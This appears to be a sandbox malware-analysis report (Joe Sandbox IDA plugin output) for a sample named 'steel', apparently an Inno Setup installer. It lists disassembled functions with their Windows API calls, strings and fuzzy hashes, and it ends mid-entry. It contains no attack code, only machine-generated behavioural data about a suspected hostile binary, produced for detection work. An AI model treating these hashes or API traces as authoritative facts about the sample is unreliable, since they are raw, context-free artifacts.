                                                                                            • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                            • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                            APIs
                                                                                            • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocHandleLockUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 2167344118-0
                                                                                            • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                            • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                            • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                            • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                            Strings
                                                                                            • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                            • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                            • API String ID: 3535843008-1938159461
                                                                                            • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                            • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                            • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                            • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                            • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                            Strings
                                                                                            • Will not restart Windows automatically., xrefs: 004836F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveForeground
                                                                                            • String ID: Will not restart Windows automatically.
                                                                                            • API String ID: 307657957-4169339592
                                                                                            • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                            • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                            • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                            • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                            APIs
                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                            • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                            Strings
                                                                                            • Extracting temporary file: , xrefs: 004763EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileTime$Local
                                                                                            • String ID: Extracting temporary file:
                                                                                            • API String ID: 791338737-4171118009
                                                                                            • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                            • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                            • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                            • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                            Strings
                                                                                            • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                            • API String ID: 0-1974262853
                                                                                            • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                            • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                            • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                            • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                            Strings
                                                                                            • %s\%s_is1, xrefs: 00478F10
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1598650737
                                                                                            • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                            • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                            • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                            • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecuteMessageSendShell
                                                                                            • String ID: open
                                                                                            • API String ID: 812272486-2758837156
                                                                                            • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                            • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                            • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                            • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                            APIs
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                            • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                            • String ID: <
                                                                                            • API String ID: 893404051-4251816714
                                                                                            • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                            • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                            • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                            • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                            • String ID: )
                                                                                            • API String ID: 2227675388-1084416617
                                                                                            • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                            • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                            • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                            • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window
                                                                                            • String ID: /INITPROCWND=$%x $@
                                                                                            • API String ID: 2353593579-4169826103
                                                                                            • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                            • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                            • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                            • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                            APIs
                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                                            • API String ID: 3952431833-1023667238
                                                                                            • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                            • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                            • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                            • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                            • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                              • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                                            • String ID: 0nI
                                                                                            • API String ID: 3798668922-794067871
                                                                                            • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                            • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                            • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                            • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$EnumQuery
                                                                                            • String ID: Inno Setup: No Icons
                                                                                            • API String ID: 1576479698-2016326496
                                                                                            • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                            • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                            • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                            • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesErrorFileLast
                                                                                            • String ID: T$H
                                                                                            • API String ID: 1799206407-488339322
                                                                                            • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                            • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                            • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                            • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                            APIs
                                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast
                                                                                            • String ID: T$H
                                                                                            • API String ID: 2018770650-488339322
                                                                                            • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                            • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                            • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                            • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                            APIs
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                            • String ID: T$H
                                                                                            • API String ID: 377330604-488339322
                                                                                            • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
